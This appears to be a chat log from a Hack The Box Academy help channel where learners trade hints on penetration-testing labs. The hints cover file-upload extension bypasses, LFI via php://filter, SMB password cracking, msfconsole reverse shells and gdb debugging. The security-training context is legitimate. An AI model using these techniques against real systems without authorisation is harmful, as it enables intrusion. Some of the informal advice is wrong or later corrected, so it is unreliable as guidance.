Which is, again, what? 10.129.121.16 or 172.16.5.19?

read the line that says "connection refused" and try to find an ip address

where is the chanel for help box lab ? i've got a problem with bloodhound ... I launch toput correctly but the zip file does not extract and remains at 0%.

so it would seem the target is not listening on that port, or the port is blocked for some reason. some obvious things when it's not listening would be that the server isn't running the app/service that is supposed to listen on that port, or maybe a firewall is blocking traffic.

there are multiple versions of sharphound/bloodhound etc. and they are incompatible with each other. whenever i've uploaded to BH and it was 0 bytes it was because i was using the wrong version. i may also recall one time because i had the .zip with root only permissions and wasn't running bh as root. so i'd check those two things.

ah I thought he had a problem thank you

Thank you ! 🙏

Update on this: so I was able to get proxychains to work by running ssh htb-ac-<ID>@htb-<KEY>.htb-cloud.com "cat /etc/proxychains.conf" | sudo tee /etc/proxychains.conf to effectively clone the proxychains settings off of PwnBox onto my personal host. Not sure what else needed to be set though besides what was mentioned in the module.

In the module: "Learning Process" section:"Documentation" There are reference to a tool called "Flameshot".

After Downloading the .msi version from the the Github repo and running it in Virustotal I get some what mixed results.
It passes the scan but community responses say it's most likely malware. Anyone else having encountered this? 🙂

yeah probably just download it from their official website, flameshot.org. or use sharex.

0A9C7D8E2AD89BB46D998B095235EB03 is the md5 hash i got from their website, 0 detctions on vt

Alas the same response, but I'll detonate it in a Sandbox or use REMnux to analys it.

Yes 0 dectections but a bunch of community warnings. I'll investigate it a bit more in a Sandbox. Thanks for the help! 🙂

Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'

post web request xan some one help me i type the falg in this box but it marks it as rowng

Try to refresh the page and resubmit it and if that doesn't work, reset the machine and try to submit that flag again.

ok thanks

can i use the same commands as kali linix in windows powre shell

You don't have to redo it, just try the flag you got again and see if it accepts it.

ok

curl syntax in windows is gonna be different, especially powershell

as curl is an alias of invoke-webrequest i believe so it has some other interesting quirks

ok ill keep that in check

curl.exe is not the same as curl which is an alias

ye

Also windows curl.exe requires a -F where on Linux it's lowercase.

This makes so much sense now

Tried using curl on windows and the syntax was insane

anyone ran into this issue while on the Public exploits on Getting started:
found the exploit and ran the path in msf .
] File saved in: /home/htb-ac-680000/.msf4/loot/20240913213839_default_94.237.59.63_simplebackup.tra_442010.txt

however when i concatonate the file theres no mention of flag.txt or even a file within the directory its mentioned in.
i just get output of backup w/ no flag.

edit: found the issue reading matters

Doesn't does anybody know why I don't have the option to send images to the channel I checked in other channels and I do have it but not in this one

to send images please verify your account -> #welcome

Im stuck on "Hunting for Stuxbox" in "Intro to Threat Hunting and hunting with elastic"

I have the cmd args after mimikatz, but it doesn't work?

Hello everyone

Yo

I want to learn Hydra anyone who wants to help me dm me

There’s a module for that

I’m new can you guide me

You have an academy account?

Can I able to remove my card details from the update payment method option ?

You’ll need to ask support to do this

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

lol

have you completed the cpts path?

Module: Attacking Common Applications
Section: Web Mass Assignment Vulnerabilities
Link to section: https://academy.hackthebox.com/module/113/section/2160

I just finished reading the section, but I'm afraid I still don't understand the whole "Mass Assignment"?

From what I can see and understand, since we have the source code, we know of a hidden parameter during registration that we can set that allows us to bypass the registration checking step.

Where does the mass assignment come into play here? Is it something in the framework that allows developers to mass import data?

yep

basically some extra variables that can be set

It's defined as:

Several frameworks offer handy mass-assignment features to lessen the workload for developers. Because of this, programmers can directly insert a whole set of user-entered data from a form into an object or database.

But that just sounds like any other form to me? 🤔

it allows assignment of parameters that may not be known to the user

also the key thing here is "database or object"

So this can be the case for pretty much any form? Having hidden parameters that aren't protected, it doesn't just have to be "certain" frameworks?

it's not really "hidden parameters" it's parameters that don't exist anywhere visible to the user

Not sure I understand what you're trying to say?

in the example you assign a value to X which any value in that X category just forces it to be true

since it's being directly input into a database, you're manipulating the data in a way that forces it to behave in certain ways, such as creating an "unverified" user

Yeah, because of the way the code is written.

What I still don't get is where the "mass assignment" comes into play?

Are they just saying that such vulnerabilities exist because the devs were more focused on ease of import of data?

So, the only way then to identify these "parameters" is to obtain access to the source code.

or send a request to the api after creating a user

You saying the API may reveal one of these "parameters"?

yes

And then we just try bypass it by guessing what to change the parameter's value to?

not necessarily guess

like yes it's a guess, but it's calculated based on various factors

https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/

https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html

https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/

So... basically the form field input names match that of the object and are directly mapped. Assuming we have access to the source code, we can then identify other parameters that were not part of the front-facing form that we can take advantage of? Am I understanding that right?

in the owasp link there's no access to the source code required

I see. Thanks for the helpful references.

Wasn't sure how to put an explanation in my notes, these references gonna be good tho.

I'm on Password Attack - Hard. How long is the cracking for initial foodhold expected to take. Can't tell if I'm down a rabbit hole at this point, been waiting for 20 mins.

i hope you're not using rockyou :)

I'm using the provided wordlist with the custom ruleset

and what service are you targetting?

trying SMB

also the assessment gives you a name to start with

yep that's the username I'm targetting

if you're not getting it then try other services

Alright I'll try that next. Longest I should wait on these challenges should be 20 mins?

between 20 and 30 minutes

File upload attack module, Blacklist filter section. I hid the extension to not spoil anything. why does my shell get printed in plaintext instead of doing its functionality?

just a heads up in "CORS Misconfigurations" section's challenge. I got different behavior from Firefox (+ FoxyProxy) and Burp's Chromium. Burp's Chromium worked as intended, whereas Firefox just redirected me back to the login page, couldn't access the profile page.

Who can I contact for help with SA 1 on the Introduction to Windows Evasion Techniques module?

have u tried other file formats?

burp repeater is ur friend here

php2-7,pht,phtml

the ones that aren't blocket display in plaintext

there is more than php

isnt the website php based tho?

I could try asp

you and i know its not asp based

yea but if php doesn't work what do i do?

take a look at limited file uploads again

that comes later in the module

wait my fault 💀 💀

i thougt u were dong skill assessment

lemme see

@vocal bridge have u checked all extenstions?

I think i checked all extensions

check the extension links in that section and fuzz

Hey everyone. I'm not here for anything in particular, just to commemorate the 2 hour waste due to a missing letter in a command making me run in circles.
Thus, to everybody, always try something twice before leaving it for done because it's really likely that you missed a goddamn "-h" in your mysql connection command

isnt that the most important part of the command

I changed wordlists for fuzzing from seclist to payload all the things

did u get it?

actually, I've used the host, of course, just missed that "-h" in front of it.
To me, at least, it comes with extreme confusion that any tool has its own namings, how comes sometimes I do need to express an user as "-u" sometimes as "-l" sometimes without flag

yup

thats just how it is sometimes

help command usually has the answer

¯_(ツ)_/¯

marcielee classic

yea, I think the main issue, at least at the beginning since I'm still kinda new, is the fact that once you try a command and it clearly returns you an access denied error, you assume that then this must not be the right way. Then you notice the goddamn flag's missing

yeah, that happens to everyone, but it helps us never do that mistake again

CPTS - password attack lab - medium

I have got initial acces to target as J***on but I tried my best to escalate privileges.
can anyone help me!!

simply use: get file_name

anyone who completed osint corporate recon module?

i want to know if its worth it for 1000 cubes

😉 look back at the documentation you got

I got credential from documents and get access to garget via SSH

What service i have to look for?

The service is mentioned in the document

it is mysql, i tried but no luck

don't have credentials

you don't? (sorry, my first reply went to wrong line)

sorry, did not get it?

Module: Attacking Common Applications
Section: Attacking Applications Connecting to Services
Link to section: https://academy.hackthebox.com/module/113/section/2154

I'm getting the following error when attempting to solve the question at the end of the section:

(gdb) run
Starting program: /home/htb-ac-773541/octopus_checker 
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x****

I've tried running gdb with sudo privileges, and I'm still receiving the same error. I'm pretty sure I've got the right memory address.

I accidentally replied to your first inquery about the the password attack lab then deleted it, becase "you don't?" was referring to you not having credentials for the service. Sorry I'm confusing. I just woke up.

Have you tried accessing mysql once you're onto the box?

yup, it is giving me error

error "access denied"

just got access to mysql db

super thanks

i cannot access skill assessment ip, why? i can access other modules labs but not for skill assessments

try switching to a different region and redownloading the VPN.

it doesn't work

What do you mean you can't access them? Not every machine can be pinged

i doing wordpress and xss modules. labs are accessible but not skill assessment. i can ping ip but can't browse

You may need to check your browser DNS settings

This is from the XSS Module

Are you trying to access this endpoint?

yes

It’s the wrong address then

This is the address: ||0x11b0||

Run and disass main

Run before disass main?

Yes with the main breakpoint

This is from the pwn box.

Just did it in this order, still didn't work...

gdb-peda$ set disassembly-flavor intel
gdb-peda$ run
gdb-peda$ disas main
gdb-peda$ b *0x5555555551b0
gdb-peda$ run

I still received the error.

It didn’t stop on the next BP?

Try c for continue after u set it

Nvm, it worked. I just put the incorrect memory address. The address changed after I ran it first. Thanks @safe star

I have question regarding windows priv esc module Kernel Exploit section. In the examples they shown, there is access to a .sln file which makes compiling the exploits pretty easy. But what do you if that file is not present ? Do you try and compile it with mingw32/64 on linux, or compile it with cl.exe on a windows vm with visual studio ? A bit lost when it comes to windows exploit compilation without when the author does not provide the .sln file

Since there isn't many comments on directions.
Anyone stuck on the final SA for the Advanced SQL Injections Module, I can help out giving some directions
https://academy.hackthebox.com/achievement/799850/188

hello folks

can someone please help me with this question: What OU is the Help Desk group managed by

LDAP module, AD path.

I do not see any attribute regarding someome managing that OU. Having said that, I entered all Members of that OU, and still is not accepting the answer.

explore all the OU's its in there... its buried but its in there

also do you know how to search ADUC? right click the DC (or click the little magnifying glass thingy... i never use that) and click "search objects" i think its called. Also while you're at it, use the powershell cmdlets to search AD as well, this will be more helpful as i think the labs want you to answer some ?s in the form of their canonical names (CNs) and that wont really be revealed in AD's search feature (easily)

im recalling a bunch of this from memory so forgive if theres an errant click or menu item name here or there, but thats the gist

Module: shells and payloads
Section: Skills Assessment
Question: Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)

Im confused on how to actually craft the payload and exploit it

i haven’t done this module, but it looks like you’re trying to upload a shell to the target with msfconsole?

set rhosts to target IP, launch a nc listener on your local machine with port 4444, and hit run on metasploit and see if it connects back?

The citrix breakout part of the Windows Priv esc module was very fun.
Ended up doing some janky stuff but it worked 🤷‍♂️

no need for nc listener , msfconsole will do that

i was going to say this

okay. there’s not a lot of context in the screenshot, and without having done this module yet i wasnt sure if he was trying to trigger a separate shell from metasploit, which ive done on live machines before lol

thinking too much into it i guess

myself but however, i will give more context rq

there is no crafting, its all syntax/cmds... in addition to the help cmd you want to add to your notes show options (which should show you how to config and run the payload info which shows details about the attack set which lets you set the configs then exploit|run which fires it off

maybe you need to upload it in other place

is it a l4j attack? looks like it might be l4j.

yeah theres a browse option to upload the file, my issue is i dont know what im supposed to really do here, cause it's asking me for zip files, i've never worked with zips for something like this

just thought probably metasploit would have something for me to do the upload

idr but just play with it , try to upload a zip and see how the web app deal with it

have you found RCE or SSRF in the app? you may need to upload a zip, figure out a way to bypass extension reqs (file upload bypass) or some such, then RCE it

I am in legacy which is retired
I use msfconsole but i didn't work
i just follw the walkthrough
some one help me

if you have an SSRF you may not need to figure an upload bypass

theyre' using apache tomcat i just know it's a file upload

the module teach you how to craft basic payload to get shell , I don't think there's ssrf

yeah no ssrf on this one

access #boxes after verifying your account -> #welcome

hmmz, ok are you interecpting the upload request? have you tried an extension bypass?

no we're not dealing with intercepting anything, nothing related to burpsuite

right, but you're uploading a file

yes

and you have an extension requirement

and your payload in a zip will not execute

whats this upload do? is it a plugin?

its supposed to give me a reverse shell

no no no

whats the application do, what is the reason for the upload?

think about this not from the attack forward but from the application backwards

we're trying to manipulate the application to give us access... if this upload installs a plugin module or something, then we need to organize our attack from that manner

if this upload stores a zip archive for file sharing, etc. etc.

holdon

look at me acting like i know what im doin

i guess the academy does work?

this upload form might be a red herring as well, so explore the application for attack surface

check out versions (and any associated CVEs) for all tooling used on the application

thanks for your.help

Hey here's a simple one, maybe im not firing on all cylinders here... im working the BBH -> LFI -> PHP Filter section

https://academy.hackthebox.com/module/23/section/1492

and its discussing a parameter vuln to LFI that does not return any data with a payload like ?lang=config.php but DOES return the data when you base64 encode it first (with the php://filter)

why would it be vuln to one manner but not the other? weak sanitization/filtering? bypasses were discussed in a previous section, some filter bypassing techniques etc but the payload does not utilize any bypassing teks other than the base64 encoding filter, im kinda at a loss for why the simple payload returns nothing but the encoded one does

nvm this may be due to how config.php does not have any print statements? i guess?

What magnifying thing ? I’m doing this command line . I’m avoiding using the GUI

ok so whats your cmdlet look like?

you should be using powershell for this and not the deprecated stuff

in case you were using like net or whatever the old stuff is

1 sec

Get-ADGroup -Identity "Help Desk" -Properties *

Then trying to visually look for it.

Ok so in the earlier sections it talked about the different kind of AD Objects, did you take notes on that?

Yes

we're looking for an OU an organizational unit, not a group.

shit , true

good point

Luckily powershell has a handy cmdlet that will burst fire across all objects with Get-ADObject its syntax is a little more verbose but you only have to remember one command

Get-ADOrganizationalUnit

yes thats an option as well

Probably